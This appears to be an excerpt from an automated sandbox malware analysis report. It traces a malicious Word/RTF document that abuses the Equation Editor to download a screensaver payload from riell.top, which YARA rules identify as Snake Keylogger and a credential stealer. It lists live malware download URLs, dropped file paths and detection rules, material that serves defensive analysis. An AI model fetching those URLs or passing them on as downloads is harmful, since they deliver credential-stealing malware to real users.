Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: obi23456.scr, 0000000A.00000002.897811172.0000000002489000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.000000000240E000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024EF000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024B4000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.000000000249E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://reallyfreegeoip.org
Source: obi23456.scr, 0000000A.00000002.897811172.0000000002351000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: obi23456.scr, 0000000A.00000002.897811172.0000000002489000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000023F6000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024EF000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024B4000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.000000000249E000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.0000000002439000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: obi23456.scr, 00000009.00000002.374798649.0000000003169000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000023F6000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897318708.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: obi23456.scr, 0000000A.00000002.897811172.0000000002439000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: obi23456.scr, 0000000A.00000002.897811172.0000000002489000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024EF000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024B4000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.000000000249E000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.0000000002439000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.334
Source: EQNEDT32.EXE, 00000008.00000003.373161386.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373241602.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, riell.top.url.0.dr String found in binary or memory: https://riell.top/
Source: obb.doc.url.0.dr String found in binary or memory: https://riell.top/obb.doc
Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000008.00000002.373226757.000000000055F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000003.373161386.000000000059F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373241602.000000000059F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://riell.top/obb.scr
Source: EQNEDT32.EXE, 00000008.00000003.373161386.000000000059F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373241602.000000000059F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://riell.top/obb.scrMC:
Source: EQNEDT32.EXE, 00000008.00000002.373226757.000000000055F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://riell.top/obb.scrhhC:
Source: EQNEDT32.EXE, 00000008.00000002.373226757.000000000055F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://riell.top/obb.scri
Source: EQNEDT32.EXE, 00000008.00000002.373226757.000000000055F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://riell.top/obb.scrj
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: unknown Network traffic detected: HTTP traffic on port 49185 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown Network traffic detected: HTTP traffic on port 49162 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown Network traffic detected: HTTP traffic on port 49164 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown Network traffic detected: HTTP traffic on port 49183 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown Network traffic detected: HTTP traffic on port 49181 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49164
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49163
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49185
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49162
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49161
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49183
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49181
Source: unknown Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49166 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49161 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49179
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49177
Source: unknown Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49175
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown Network traffic detected: HTTP traffic on port 49175 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49177 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49179 -> 443
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49168 version: TLS 1.2

System Summary

Source: 9.2.obi23456.scr.31b7b70.6.unpack, type: UNPACKEDPE Matched rule: Detects downloader injector Author: ditekSHen
Source: 9.2.obi23456.scr.32471f0.7.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.obi23456.scr.32471f0.7.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.obi23456.scr.32471f0.7.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.obi23456.scr.32471f0.7.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 9.2.obi23456.scr.3267a20.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.obi23456.scr.3267a20.5.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.obi23456.scr.3267a20.5.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.obi23456.scr.3267a20.5.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 9.2.obi23456.scr.780000.2.unpack, type: UNPACKEDPE Matched rule: Detects downloader injector Author: ditekSHen
Source: 10.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 9.2.obi23456.scr.780000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects downloader injector Author: ditekSHen
Source: 9.2.obi23456.scr.21b9714.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects downloader injector Author: ditekSHen
Source: 9.2.obi23456.scr.21b6ed4.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects downloader injector Author: ditekSHen
Source: 9.2.obi23456.scr.3267a20.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.obi23456.scr.3267a20.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.obi23456.scr.3267a20.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.obi23456.scr.3267a20.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects downloader injector Author: ditekSHen
Source: 9.2.obi23456.scr.32471f0.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.obi23456.scr.32471f0.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.obi23456.scr.32471f0.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.obi23456.scr.32471f0.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000009.00000002.374594204.0000000000780000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects downloader injector Author: ditekSHen
Source: 0000000A.00000002.897318708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000A.00000002.897318708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000009.00000002.374798649.0000000003169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000009.00000002.374798649.0000000003169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: obi23456.scr PID: 3376, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: obi23456.scr PID: 3376, type: MEMORYSTR Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: obi23456.scr PID: 3404, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: obi23456.scr PID: 3404, type: MEMORYSTR Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\91894CAD.doc, type: DROPPED Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\obb[1].doc, type: DROPPED Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\obb.doc.url
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\riell.top.url
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\obi23456.scr
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\obb[1].scr
Source: C:\Users\user\AppData\Roaming\obi23456.scr Process Stats: CPU usage > 49%
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\obi23456.scr Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\obi23456.scr Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 9_2_0026425F 9_2_0026425F
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_001C5038 10_2_001C5038
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_001C3065 10_2_001C3065
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_001C3891 10_2_001C3891
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_001C78C1 10_2_001C78C1
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_001C2910 10_2_001C2910
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_001C4130 10_2_001C4130
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_001CD1D8 10_2_001CD1D8
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_001C5B18 10_2_001C5B18
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_001C3B72 10_2_001C3B72
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_001C2BF1 10_2_001C2BF1
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_001C844D 10_2_001C844D
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_001C8CB2 10_2_001C8CB2
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_001C35B0 10_2_001C35B0
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_001C3E50 10_2_001C3E50
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_001CC750 10_2_001CC750
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_001C6740 10_2_001C6740
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_001C7000 10_2_001C7000
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_001C6BA0 10_2_001C6BA0
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_001C7460 10_2_001C7460
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_001CC740 10_2_001CC740
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_001CBFC8 10_2_001CBFC8
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_001CBFC5 10_2_001CBFC5
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003FF460 10_2_003FF460
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003FD4E0 10_2_003FD4E0
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003FE178 10_2_003FE178
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003FEE10 10_2_003FEE10
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F5E58 10_2_003F5E58
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003FDB30 10_2_003FDB30
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003FE7C0 10_2_003FE7C0
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F443C 10_2_003F443C
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F1028 10_2_003F1028
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003FC028 10_2_003FC028
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F1018 10_2_003F1018
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F1471 10_2_003F1471
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F9468 10_2_003F9468
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F9459 10_2_003F9459
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F4448 10_2_003F4448
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F6CBC 10_2_003F6CBC
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F48A0 10_2_003F48A0
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F4890 10_2_003F4890
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F1480 10_2_003F1480
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003FC480 10_2_003FC480
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F4CF8 10_2_003F4CF8
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F4CF0 10_2_003F4CF0
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F98E8 10_2_003F98E8
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F18D8 10_2_003F18D8
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003FC8D8 10_2_003FC8D8
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F18C9 10_2_003F18C9
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F6CC8 10_2_003F6CC8
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F1D30 10_2_003F1D30
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F1D20 10_2_003F1D20
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F2178 10_2_003F2178
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F5150 10_2_003F5150
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F9D40 10_2_003F9D40
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F5140 10_2_003F5140
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F55A8 10_2_003F55A8
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003FA198 10_2_003FA198
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F5598 10_2_003F5598
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F2188 10_2_003F2188
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003FA188 10_2_003FA188
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F59F8 10_2_003F59F8
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003FA5F0 10_2_003FA5F0
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003FA5E1 10_2_003FA5E1
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F25E0 10_2_003F25E0
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F25D1 10_2_003F25D1
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F2A38 10_2_003F2A38
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003FAA38 10_2_003FAA38
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F2A28 10_2_003F2A28
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F7A10 10_2_003F7A10
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F5A00 10_2_003F5A00
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003FAA48 10_2_003FAA48
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003FAEA0 10_2_003FAEA0
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F7698 10_2_003F7698
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F2E90 10_2_003F2E90
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003FAE90 10_2_003FAE90
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F2E81 10_2_003F2E81
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F32E8 10_2_003F32E8
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F32D9 10_2_003F32D9
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F3738 10_2_003F3738
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F0320 10_2_003F0320
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003FB320 10_2_003FB320
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003FB311 10_2_003FB311
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F0310 10_2_003F0310
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F8708 10_2_003F8708
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F0778 10_2_003F0778
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003FB778 10_2_003FB778
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F0768 10_2_003F0768
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003FB767 10_2_003FB767
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F3740 10_2_003F3740
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F3B98 10_2_003F3B98
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F3B88 10_2_003F3B88
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F3FF0 10_2_003F3FF0
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F3FED 10_2_003F3FED
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F0BD0 10_2_003F0BD0
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003FBBD0 10_2_003FBBD0
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003F0BC4 10_2_003F0BC4
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_003FBBC1 10_2_003FBBC1
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_00590040 10_2_00590040
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_00590CD8 10_2_00590CD8
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_00590690 10_2_00590690
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_00590006 10_2_00590006
Source: ~WRF{ACEFE1B1-39FF-4750-A188-3592D29053CF}.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: 9.2.obi23456.scr.31b7b70.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 9.2.obi23456.scr.32471f0.7.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.obi23456.scr.32471f0.7.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.obi23456.scr.32471f0.7.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.obi23456.scr.32471f0.7.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 9.2.obi23456.scr.3267a20.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
